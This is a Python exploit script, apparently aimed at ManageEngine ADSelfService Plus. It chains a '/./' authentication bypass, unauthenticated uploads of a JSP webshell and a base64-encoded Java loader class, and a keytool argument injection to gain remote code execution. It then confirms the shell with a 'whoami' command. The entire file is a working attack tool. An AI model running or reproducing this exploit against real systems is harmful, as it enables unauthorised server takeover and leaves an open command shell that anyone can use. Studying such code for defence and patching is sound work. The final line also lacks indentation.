#!/usr/bin/env python3
import argparse
import sys
from base64 import b64decode
from io import BytesIO

import requests
import urllib3
# Every request in this script is sent with verify=False, so silence the
# InsecureRequestWarning urllib3 would otherwise print per request. This only
# hides the warning; certificate verification is still skipped on each call.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
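def main():
    """Parse the command line and run the exploit chain against the target.

    Options:
        -t/--target      base URL of the target, scheme included
        -w/--webshell    optional JSP file to upload instead of the built-in shell
        -j/--java_class  optional compiled class to upload instead of the built-in
                         one; it is uploaded as Si.class and later loaded by the
                         name ``Si``, so a custom class should carry that name
        -s/--skip        do not run the vulnerability check first
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', required=True,
                        help='Remote Target IP Address (ex: http://192.168.10.5/)')
    parser.add_argument('-w', '--webshell', required=False, help='Path to jsp file to execute')
    parser.add_argument('-j', '--java_class', required=False, help='Path to java class to execute')
    parser.add_argument('-s', '--skip', required=False, default=False, action='store_true',
                        help='Do not verify if target is vulnerable')
    args = parser.parse_args()
    # Every endpoint below is appended as "/./RestAPI/..." (the "/./" is the
    # auth-bypass and must stay), so a target given with a trailing slash, as in
    # the help text, would otherwise yield "//./RestAPI/...". Normalise once here.
    args.target = args.target.rstrip('/')
    exploit(args)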
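def check(args):
    """Probe the target for the path-normalisation auth bypass; exit(1) if absent.

    Posts ``methodToCall=previewMobLogo`` to ``/./RestAPI/LogonCustomization``.
    The ``/./`` segment is the bypass itself, so the URL is re-applied to the
    prepared request after ``prepare()`` to stop requests from normalising it
    away. A body containing the expected inline ``<script>`` is taken as
    "vulnerable"; any other body, or a request error, ends the program.
    """
    # Require an explicit scheme: the original substring test ("http" in target)
    # also accepted hostnames such as "http-gw.local" with no scheme at all.
    if not args.target.startswith(('http://', 'https://')):
        print("Please specify schema (http/https)")
        sys.exit(1)
    check_url = args.target + "/./RestAPI/LogonCustomization"
    session = requests.Session()
    request = requests.Request(url=check_url, method='POST',
                               data={"methodToCall": "previewMobLogo"})
    prepared = request.prepare()
    prepared.url = check_url  # keep the un-normalised "/./" path
    try:
        # Bounded so an unresponsive host cannot hang the check forever.
        response = session.send(prepared, verify=False, timeout=30)
    except requests.RequestException as exc:
        print(exc)
        sys.exit(1)
    if '<script type="text/javascript">var d = new Date();' in response.text:
        print("[+] Target is vulnerable!")
        return
    print("[-] Target doesn't seem vulnerable")
    sys.exit(1)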
def exploit(args):
    """Run the full chain: optional check, two uploads, trigger, then verify.

    Every step except the last exits the process on failure, so reaching a
    step means all previous ones reported success. ``verify_webshell`` only
    reports; it never exits.
    """
    if not args.skip:
        check(args)
    # Drop the JSP, drop the loader class, make the server load it, then
    # confirm the shell answers.
    for step in (upload_jsp, upload_java_class, execute_rce, verify_webshell):
        step(args)
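def upload_jsp(args):
    """Upload the JSP webshell through the unauthenticated customisation endpoint.

    The file is sent as the ``CERTIFICATE_PATH`` part of a smartcard "Add"
    form to ``/./RestAPI/LogonCustomization``. A 404 reply is what the script
    treats as success (the server apparently writes the file before failing
    the request); anything else exits with status 1.

    Uses ``args.webshell`` when given, otherwise a built-in shell that runs
    ``request.getParameter("cmd")`` with no authentication whatsoever: once
    in place it is usable by anyone who can reach the host, so remove it when
    the engagement is over.
    """
    upload_url = args.target + "/./RestAPI/LogonCustomization"
    if args.webshell:
        # Read and close the file ourselves: the original passed an open
        # text-mode handle to requests and never closed it. Binary mode keeps
        # the bytes exactly as on disk (no newline translation).
        with open(args.webshell, 'rb') as fh:
            payload = fh.read()
    else:
        payload = """<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
"""
    # The upload name is fixed: the bundled Si class copies "ws.jsp" to its
    # final location, so a custom shell must still be uploaded under this name.
    files = {'CERTIFICATE_PATH': ('ws.jsp', payload)}
    data = {"methodToCall": "unspecified", "Save": "yes", "form": "smartcard", "operation": "Add"}
    session = requests.Session()
    prepared = requests.Request(url=upload_url, method='POST', files=files, data=data).prepare()
    prepared.url = upload_url  # preserve the "/./" segment that bypasses auth
    try:
        response = session.send(prepared, verify=False, timeout=30)
    except requests.RequestException as exc:
        print("[-] Can't upload webshell: {}".format(exc))
        sys.exit(1)
    if response.status_code == 404:
        print("[+] Webshell successfully uploaded")
    else:
        print("[-] Can't upload webshell")
        sys.exit(1)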
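def upload_java_class(args):
    """Upload the loader class that ``execute_rce`` later makes keytool load.

    Same endpoint and form as ``upload_jsp``; the file is always stored as
    ``Si.class`` because ``execute_rce`` passes ``-providerclass Si``, so a
    custom ``args.java_class`` should define a class named ``Si`` whose static
    initialiser does the work. The bundled class (Java 8 bytecode; decode the
    base64 to confirm) runs
    ``cmd /c copy ws.jsp ..\\webapps\\adssp\\help\\admin-guide\\test.jsp``
    from its ``<clinit>``, which is why ``verify_webshell`` looks for the shell
    under ``/help/admin-guide/test.jsp``.
    A 404 reply is treated as success; anything else exits with status 1.
    """
    upload_url = args.target + "/./RestAPI/LogonCustomization"
    if args.java_class:
        # Read and close the file ourselves instead of leaking an open handle.
        with open(args.java_class, 'rb') as fh:
            payload = BytesIO(fh.read())
    else:
        java1_8_payload_b64 = "yv66vgAAADQAKAoADAAWCgAXABgHABkIABoIABsIABwIAB0IAB4KABcAHwcAIAcAIQcAIgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAg8Y2xpbml0PgEADVN0YWNrTWFwVGFibGUHACABAApTb3VyY2VGaWxlAQAHU2kuamF2YQwADQAOBwAjDAAkACUBABBqYXZhL2xhbmcvU3RyaW5nAQADY21kAQACL2MBAARjb3B5AQAGd3MuanNwAQAqLi5cd2ViYXBwc1xhZHNzcFxoZWxwXGFkbWluLWd1aWRlXHRlc3QuanNwDAAmACcBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQACU2kBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQALAAwAAAAAAAIAAQANAA4AAQAPAAAAHQABAAEAAAAFKrcAAbEAAAABABAAAAAGAAEAAAACAAgAEQAOAAEADwAAAGQABQACAAAAK7gAAksqCL0AA1kDEgRTWQQSBVNZBRIGU1kGEgdTWQcSCFO2AAlMpwAES7EAAQAAACYAKQAKAAIAEAAAABIABAAAAAUABAAGACYABwAqAAgAEgAAAAcAAmkHABMAAAEAFAAAAAIAFQ=="
        payload = BytesIO(b64decode(java1_8_payload_b64))
    files = {'CERTIFICATE_PATH': ('Si.class', payload)}
    data = {"methodToCall": "unspecified", "Save": "yes", "form": "smartcard", "operation": "Add"}
    session = requests.Session()
    prepared = requests.Request(url=upload_url, method='POST', files=files, data=data).prepare()
    prepared.url = upload_url  # preserve the "/./" segment that bypasses auth
    try:
        response = session.send(prepared, verify=False, timeout=30)
    except requests.RequestException as exc:
        print("[-] Can't upload Java Class: {}".format(exc))
        sys.exit(1)
    if response.status_code == 404:
        print("[+] Java Class successfully uploaded")
    else:
        print("[-] Can't upload Java Class")
        sys.exit(1)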
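def execute_rce(args):
    """Trigger the uploaded class by injecting keytool flags into a CSR request.

    ``/./RestAPI/Connection`` with ``methodToCall=openSSLTool`` and
    ``action=generateCSR`` appears to pass ``KEY_LENGTH`` straight onto a
    keytool command line; the value here appends
    ``-providerclass Si -providerpath "..\\bin"`` so keytool loads ``Si.class``
    (which the earlier upload placed there, presumably under ``bin``) and runs
    its static initialiser. As with the uploads, a 404 reply is the expected
    outcome; any other code exits with status 1.
    """
    rce_url = args.target + "/./RestAPI/Connection"
    data = {"methodToCall": "openSSLTool", "action": "generateCSR",
            "KEY_LENGTH": '1024 -providerclass Si -providerpath "..\\bin"'}
    session = requests.Session()
    prepared = requests.Request(url=rce_url, method='POST', data=data).prepare()
    prepared.url = rce_url  # preserve the "/./" segment that bypasses auth
    try:
        # keytool runs server-side before the reply; allow more time than the
        # plain uploads but still do not wait forever.
        response = session.send(prepared, verify=False, timeout=120)
    except requests.RequestException as exc:
        print("[-] Can't trigger RCE from Java Class: {}".format(exc))
        sys.exit(1)
    if response.status_code == 404:
        print("[+] Got expected response code to trigger RCE")
    else:
        print("[-] Can't trigger RCE from Java Class")
        print("Server replied with status code {}".format(response.status_code))
        sys.exit(1)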
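def verify_webshell(args):
    """Call the dropped shell once with ``powershell "whoami"`` and report.

    Best-effort: this step never exits the process. The shell is expected at
    ``/help/admin-guide/test.jsp``, the path the bundled ``Si`` class copies
    it to, so a custom ``-j`` class that copies elsewhere will be reported as
    a miss even when it worked. The endpoint is reachable without any
    authentication; the printed URL is a live, unprotected command shell.
    """
    webshell_url = args.target + "/help/admin-guide/test.jsp"
    try:
        # The request is the only thing here that can actually fail; the
        # original guarded the prints with a bare except and left this bare.
        response = requests.post(webshell_url, data={"cmd": 'powershell "whoami"'},
                                 verify=False, timeout=60)
    except requests.RequestException as exc:
        print("Can't reach webshell: {}".format(exc))
        return
    if response.status_code == 404:
        print("Can't find webshell")
        return
    print(response.text)
    print("[+] Webshell successfully uploaded.")
    print("[+] Find it on {}".format(webshell_url))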
if __name__ == '__main__':
main()